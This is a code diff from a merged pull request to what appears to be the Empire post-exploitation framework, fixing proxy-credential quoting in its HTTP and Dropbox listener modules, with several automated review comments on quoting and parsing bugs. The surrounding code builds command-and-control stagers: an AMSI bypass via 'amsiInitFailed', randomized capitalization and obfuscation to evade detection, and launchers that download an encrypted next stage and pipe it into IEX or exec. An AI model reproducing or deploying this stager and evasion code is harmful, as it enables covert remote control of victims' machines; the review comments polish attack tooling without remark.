Merge pull request #728 from dirkjanm/dev
Fixed custom proxy config in launcher code
websockets-multiuser
commit
223079597c
|
@ -222,7 +222,7 @@ class Listener:
|
|||
password = proxyCreds.split(':')[1]
|
||||
domain = username.split('\\')[0]
|
||||
usr = username.split('\\')[1]
|
||||
stager += "$netcred = New-Object System.Net.NetworkCredential("+usr+","+password+","+domain+");"
|
||||
stager += "$netcred = New-Object System.Net.NetworkCredential('"+usr+"','"+password+"','"+domain+"');"
|
||||
stager += helpers.randomize_capitalization("$wc.Proxy.Credentials = $netcred;")
|
||||
|
||||
#save the proxy settings to use during the entire staging process and the agent
|
||||
|
@ -307,7 +307,7 @@ class Listener:
|
|||
launcherBase += "proxy_auth_handler = urllib2.ProxyBasicAuthHandler();\n"
|
||||
username = proxyCreds.split(':')[0]
|
||||
password = proxyCreds.split(':')[1]
|
||||
launcherBase += "proxy_auth_handler.add_password(None,"+proxy+","+username+","+password+");\n"
|
||||
launcherBase += "proxy_auth_handler.add_password(None,'"+proxy+"','"+username+"','"+password+"');\n"
|
||||
launcherBase += "o = urllib2.build_opener(proxy, proxy_auth_handler);\n"
|
||||
else:
|
||||
launcherBase += "o = urllib2.build_opener(proxy);\n"
|
||||
|
@ -484,7 +484,7 @@ class Listener:
|
|||
#strip out comments and blank lines
|
||||
code = helpers.strip_python_comments(code)
|
||||
|
||||
#patch some more
|
||||
#patch some more
|
||||
code = code.replace('delay = 60', 'delay = %s' % (delay))
|
||||
code = code.replace('jitter = 0.0', 'jitter = %s' % (jitter))
|
||||
code = code.replace('profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"', 'profile = "%s"' % (profile))
|
||||
|
@ -661,16 +661,16 @@ def send_message(packets=None):
|
|||
except:
|
||||
pass
|
||||
|
||||
|
||||
|
||||
if packets:
|
||||
data = ''.join(packets)
|
||||
# aes_encrypt_then_hmac is in stager.py
|
||||
encData = aes_encrypt_then_hmac(key, data)
|
||||
data = build_routing_packet(stagingKey, sessionID, meta=5, encData=encData)
|
||||
#check to see if there are any results already present
|
||||
|
||||
|
||||
headers['Dropbox-API-Arg'] = "{\\"path\\":\\"%s/%s.txt\\"}" % (resultsFolder, sessionID)
|
||||
|
||||
|
||||
try:
|
||||
pkdata = post_message('https://content.dropboxapi.com/2/files/download', data=None, headers=headers)
|
||||
except:
|
||||
|
@ -953,7 +953,7 @@ def send_message(packets=None):
|
|||
dbx.files_delete(fileName)
|
||||
except dropbox.exceptions.ApiError:
|
||||
dispatcher.send("[!] Error deleting data at '%s'" % (fileName), sender="listeners/dropbox")
|
||||
|
||||
|
||||
self.mainMenu.agents.handle_agent_data(stagingKey, responseData, listenerOptions)
|
||||
|
||||
|
||||
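Review bot: The quoted `NetworkCredential` line in the -222 hunk and the quoted `add_password` line in the -307 hunk still concatenate `usr`, `password`, `domain` and `proxy` into single-quoted literals without escaping, so a value containing `'` ends the literal early and the remainder is parsed as code in the generated script. Escape per target language before concatenating: for the PowerShell string double the quote, `password.replace("'", "''")`, and for the Python launcher emit the literal with `repr(password)` rather than hand-written quotes. `proxyCreds.split(':')[1]` also discards everything after a second colon, which `proxyCreds.split(':', 1)` would keep. The same lines recur in the -243/-367, -198/-294 and -176/-262 hunks of the other three files, and the enclosing blocks start outside the hunks shown.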
|
|
|
@ -243,7 +243,7 @@ class Listener:
|
|||
password = proxyCreds.split(':')[1]
|
||||
domain = username.split('\\')[0]
|
||||
usr = username.split('\\')[1]
|
||||
stager += "$netcred = New-Object System.Net.NetworkCredential("+usr+","+password+","+domain+");"
|
||||
stager += "$netcred = New-Object System.Net.NetworkCredential('"+usr+"','"+password+"','"+domain+"');"
|
||||
stager += helpers.randomize_capitalization("$wc.Proxy.Credentials = $netcred;")
|
||||
|
||||
#save the proxy settings to use during the entire staging process and the agent
|
||||
|
@ -259,7 +259,7 @@ class Listener:
|
|||
if "https" in host:
|
||||
host = 'https://' + '[' + str(bindIP) + ']' + ":" + str(port)
|
||||
else:
|
||||
host = 'http://' + '[' + str(bindIP) + ']' + ":" + str(port)
|
||||
host = 'http://' + '[' + str(bindIP) + ']' + ":" + str(port)
|
||||
|
||||
# code to turn the key string into a byte array
|
||||
stager += helpers.randomize_capitalization("$K=[System.Text.Encoding]::ASCII.GetBytes(")
|
||||
|
@ -296,7 +296,7 @@ class Listener:
|
|||
|
||||
# decode everything and kick it over to IEX to kick off execution
|
||||
stager += helpers.randomize_capitalization("-join[Char[]](& $R $data ($IV+$K))|IEX")
|
||||
|
||||
|
||||
if obfuscate:
|
||||
stager = helpers.obfuscate(stager, obfuscationCommand=obfuscationCommand)
|
||||
# base64 encode the stager and return it
|
||||
|
@ -338,7 +338,7 @@ class Listener:
|
|||
# prebuild the request routing packet for the launcher
|
||||
routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='PYTHON', meta='STAGE0', additional='None', encData='')
|
||||
b64RoutingPacket = base64.b64encode(routingPacket)
|
||||
|
||||
|
||||
launcherBase += "req=urllib2.Request(server+t);\n"
|
||||
# add the RC4 packet to a cookie
|
||||
launcherBase += "req.add_header('User-Agent',UA);\n"
|
||||
|
@ -352,7 +352,7 @@ class Listener:
|
|||
#launcherBase += ",\"%s\":\"%s\"" % (headerKey, headerValue)
|
||||
launcherBase += "req.add_header(\"%s\",\"%s\");\n" % (headerKey, headerValue)
|
||||
|
||||
|
||||
|
||||
if proxy.lower() != "none":
|
||||
if proxy.lower() == "default":
|
||||
launcherBase += "proxy = urllib2.ProxyHandler();\n"
|
||||
|
@ -367,7 +367,7 @@ class Listener:
|
|||
launcherBase += "proxy_auth_handler = urllib2.ProxyBasicAuthHandler();\n"
|
||||
username = proxyCreds.split(':')[0]
|
||||
password = proxyCreds.split(':')[1]
|
||||
launcherBase += "proxy_auth_handler.add_password(None,"+proxy+","+username+","+password+");\n"
|
||||
launcherBase += "proxy_auth_handler.add_password(None,'"+proxy+"','"+username+"','"+password+"');\n"
|
||||
launcherBase += "o = urllib2.build_opener(proxy, proxy_auth_handler);\n"
|
||||
else:
|
||||
launcherBase += "o = urllib2.build_opener(proxy);\n"
|
||||
|
@ -378,7 +378,7 @@ class Listener:
|
|||
launcherBase += "urllib2.install_opener(o);\n"
|
||||
|
||||
# download the stager and extract the IV
|
||||
|
||||
|
||||
launcherBase += "a=urllib2.urlopen(req).read();\n"
|
||||
launcherBase += "IV=a[0:4];"
|
||||
launcherBase += "data=a[4:];"
|
||||
|
@ -419,8 +419,8 @@ class Listener:
|
|||
if not language:
|
||||
print helpers.color('[!] listeners/http generate_stager(): no language specified!')
|
||||
return None
|
||||
|
||||
|
||||
|
||||
|
||||
profile = listenerOptions['DefaultProfile']['Value']
|
||||
uris = [a.strip('/') for a in profile.split('|')[0].split(',')]
|
||||
launcher = listenerOptions['Launcher']['Value']
|
||||
|
@ -475,7 +475,7 @@ class Listener:
|
|||
randomizedStager += helpers.randomize_capitalization(line)
|
||||
else:
|
||||
randomizedStager += line
|
||||
|
||||
|
||||
if obfuscate:
|
||||
randomizedStager = helpers.obfuscate(randomizedStager, obfuscationCommand=obfuscationCommand)
|
||||
# base64 encode the stager and return it
|
||||
|
@ -638,7 +638,7 @@ class Listener:
|
|||
if($Script:Proxy) {
|
||||
$wc.Proxy = $Script:Proxy;
|
||||
}
|
||||
|
||||
|
||||
$wc.Headers.Add("User-Agent",$script:UserAgent)
|
||||
$script:Headers.GetEnumerator() | % {$wc.Headers.Add($_.Name, $_.Value)}
|
||||
$wc.Headers.Add("Cookie", "session=$RoutingCookie")
|
||||
|
@ -680,7 +680,7 @@ class Listener:
|
|||
if($Script:Proxy) {
|
||||
$wc.Proxy = $Script:Proxy;
|
||||
}
|
||||
|
||||
|
||||
$wc.Headers.Add('User-Agent', $Script:UserAgent)
|
||||
$Script:Headers.GetEnumerator() | ForEach-Object {$wc.Headers.Add($_.Name, $_.Value)}
|
||||
|
||||
|
@ -783,7 +783,7 @@ def send_message(packets=None):
|
|||
app = Flask(__name__)
|
||||
self.app = app
|
||||
|
||||
|
||||
|
||||
@app.route('/<string:stagerURI>')
|
||||
def send_stager(stagerURI):
|
||||
if stagerURI:
|
||||
|
@ -987,4 +987,4 @@ def send_message(packets=None):
|
|||
self.threads[name].kill()
|
||||
else:
|
||||
print helpers.color("[!] Killing listener '%s'" % (self.options['Name']['Value']))
|
||||
self.threads[self.options['Name']['Value']].kill()
|
||||
self.threads[self.options['Name']['Value']].kill()
|
||||
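Review bot: `if "https" in host:` in the -259 hunk is a substring test, so it also matches a plain-HTTP host whose name or path merely contains the text "https" and would rebuild the URL with the wrong scheme. Anchoring the check to the scheme, `if host.startswith('https'):`, says what is meant. The branch that contains this test starts outside the hunk, so how `host` is normalised beforehand is not visible here.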
|
|
|
@ -141,7 +141,7 @@ class Listener:
|
|||
uris = [a for a in profile.split('|')[0].split(',')]
|
||||
stage0 = random.choice(uris)
|
||||
customHeaders = profile.split('|')[2:]
|
||||
|
||||
|
||||
if language.startswith('po'):
|
||||
# PowerShell
|
||||
|
||||
|
@ -164,7 +164,7 @@ class Listener:
|
|||
stager += "'amsiInitFailed','NonPublic,Static'"
|
||||
stager += helpers.randomize_capitalization(").SetValue($null,$true)};")
|
||||
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
|
||||
|
||||
|
||||
stager += helpers.randomize_capitalization("$wc=New-Object System.Net.WebClient;")
|
||||
|
||||
if userAgent.lower() == 'default':
|
||||
|
@ -198,7 +198,7 @@ class Listener:
|
|||
password = proxyCreds.split(':')[1]
|
||||
domain = username.split('\\')[0]
|
||||
usr = username.split('\\')[1]
|
||||
stager += "$netcred = New-Object System.Net.NetworkCredential("+usr+","+password+","+domain+");"
|
||||
stager += "$netcred = New-Object System.Net.NetworkCredential('"+usr+"','"+password+"','"+domain+"');"
|
||||
stager += helpers.randomize_capitalization("$wc.Proxy.Credentials = $netcred;")
|
||||
|
||||
# TODO: reimplement stager retries?
|
||||
|
@ -210,7 +210,7 @@ class Listener:
|
|||
headerValue = header.split(':')[1]
|
||||
stager += helpers.randomize_capitalization("$wc.Headers.Add(")
|
||||
stager += "\"%s\",\"%s\");" % (headerKey, headerValue)
|
||||
|
||||
|
||||
# code to turn the key string into a byte array
|
||||
stager += helpers.randomize_capitalization("$K=[System.Text.Encoding]::ASCII.GetBytes(")
|
||||
stager += "'%s');" % (stagingKey)
|
||||
|
@ -294,7 +294,7 @@ class Listener:
|
|||
launcherBase += "proxy_auth_handler = urllib2.ProxyBasicAuthHandler();\n"
|
||||
username = proxyCreds.split(':')[0]
|
||||
password = proxyCreds.split(':')[1]
|
||||
launcherBase += "proxy_auth_handler.add_password(None,"+proxy+","+username+","+password+");\n"
|
||||
launcherBase += "proxy_auth_handler.add_password(None,'"+proxy+"','"+username+"','"+password+"');\n"
|
||||
launcherBase += "o = urllib2.build_opener(proxy, proxy_auth_handler);\n"
|
||||
else:
|
||||
launcherBase += "o = urllib2.build_opener(proxy);\n"
|
||||
|
@ -363,12 +363,12 @@ class Listener:
|
|||
|
||||
if language:
|
||||
if language.lower() == 'powershell':
|
||||
|
||||
|
||||
updateServers = """
|
||||
$Script:ControlServers = @("%s");
|
||||
$Script:ServerIndex = 0;
|
||||
""" % (listenerOptions['Host']['Value'])
|
||||
|
||||
|
||||
getTask = """
|
||||
function script:Get-Task {
|
||||
|
||||
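Review bot: `headerValue = header.split(':')[1]` in the -210 hunk truncates any custom header whose value itself contains a colon (a URL or a time, for example), because only the second field of the split is kept. Limiting the split keeps the full value: `headerValue = header.split(':', 1)[1]`. The value is then placed in a double-quoted string by `"\"%s\",\"%s\");" % (headerKey, headerValue)` without escaping, so a `"` in the profile would also break the generated line. The loop and the `headerKey` assignment are outside the hunk.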
|
|
|
@ -176,7 +176,7 @@ class Listener:
|
|||
password = proxyCreds.split(':')[1]
|
||||
domain = username.split('\\')[0]
|
||||
usr = username.split('\\')[1]
|
||||
stager += "$netcred = New-Object System.Net.NetworkCredential("+usr+","+password+","+domain+");"
|
||||
stager += "$netcred = New-Object System.Net.NetworkCredential('"+usr+"','"+password+"','"+domain+"');"
|
||||
stager += helpers.randomize_capitalization("$wc.Proxy.Credentials = $netcred;")
|
||||
|
||||
# TODO: reimplement stager retries?
|
||||
|
@ -247,7 +247,7 @@ class Listener:
|
|||
# add the RC4 packet to a cookie
|
||||
launcherBase += "o.addheaders=[('User-Agent',UA), (\"Cookie\", \"session=%s\")];\n" % (b64RoutingPacket)
|
||||
launcherBase += "import urllib2\n"
|
||||
|
||||
|
||||
if proxy.lower() != "none":
|
||||
if proxy.lower() == "default":
|
||||
launcherBase += "proxy = urllib2.ProxyHandler();\n"
|
||||
|
@ -262,7 +262,7 @@ class Listener:
|
|||
launcherBase += "proxy_auth_handler = urllib2.ProxyBasicAuthHandler();\n"
|
||||
username = proxyCreds.split(':')[0]
|
||||
password = proxyCreds.split(':')[1]
|
||||
launcherBase += "proxy_auth_handler.add_password(None,"+proxy+","+username+","+password+");\n"
|
||||
launcherBase += "proxy_auth_handler.add_password(None,'"+proxy+"','"+username+"','"+password+"');\n"
|
||||
launcherBase += "o = urllib2.build_opener(proxy, proxy_auth_handler);\n"
|
||||
else:
|
||||
launcherBase += "o = urllib2.build_opener(proxy);\n"
|
||||
|
@ -271,7 +271,7 @@ class Listener:
|
|||
|
||||
#install proxy and creds globally, so they can be used with urlopen.
|
||||
launcherBase += "urllib2.install_opener(o);\n"
|
||||
|
||||
|
||||
# download the stager and extract the IV
|
||||
launcherBase += "a=o.open(server+t).read();"
|
||||
launcherBase += "IV=a[0:4];"
|
||||
|
|